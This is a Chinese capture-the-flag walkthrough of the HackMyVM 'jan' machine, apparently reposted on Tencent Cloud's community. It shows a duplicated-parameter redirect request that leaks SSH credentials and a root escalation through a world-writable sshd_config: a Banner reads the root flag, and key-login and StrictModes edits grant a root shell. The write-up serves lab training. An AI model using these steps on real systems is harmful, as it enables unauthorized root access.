Welcome to our Public Server. Maybe Internal. 只能内部访问
robots.txt泄露了两个路径
/redirect
/credz
https://www.hyhforever.top/posts/2025/04/hackmyvm-jan/
看了大佬的wp,说这里是变量覆盖,
http://127.0.0.1/redirect?url=adfads&url=/credz
ssh/EazyLOL 获取都用户名和口令ssh登录
root flag
sudo -l
Matching Defaults entries for ssh on jan:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for ssh:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User ssh may run the following commands on jan:
(root) NOPASSWD: /sbin/service sshd restart
可以重启ssh服务,发现sshd_config可写,通过banner设置为/root/root.xt读取root flag
ls -al
-rw-rw-rw- 1 root root 3364 Aug 12 15:10 sshd_config
vi sshd_config
Banner /root/root.txt
sudo service sshd restart
重新登录获取flag
拿shell方案
# 注意:如果默认 PermitRootLogin 是 no,需要改成 yes 或 prohibit-password (允许公钥登录)。
PermitRootLogin yes
# 确保服务器允许公钥认证
PubkeyAuthentication yes
# 指向你刚才创建的文件
AuthorizedKeysFile /home/ssh/key
StrictModes no
#注意,我们是把公钥放在了自定义文件中,这与 SSH 的严格模式冲突,会导致导致 sshd 不信任其中的公钥。
即使 `sshd_config` 文件里 `#StrictModes yes` 是注释掉的,OpenSSH 默认仍会把它视为 `yes`。
只有显式设置 `StrictModes no`,才会允许加载不安全路径下的 authorized_keys 文件
StrictModes yes 是一个配置项,用于指定在sshd启动过程中是否验证home目录和.ssh目录的权限。当StrictModes设置为yes时,sshd会要求家目录和.ssh目录的权限设置非常严格,必须是特定的权限设置才能通过验证
端口定位进程启动命令
jan:~# netstat -tunpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 9816/sshd [listener
tcp 0 0 :::8080 :::* LISTEN 2449/httpz
tcp 0 0 :::22 :::* LISTEN 9816/sshd [listener
定位进程号 2449
cat /proc/2449/cmdline
/opt/httpz go语言写的程序,
至于开头的重定向绕过是什么逻辑,靶机作者自己写的httpz的可执行文件(go语言),需要反编译才能看到,我不会遂放弃
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。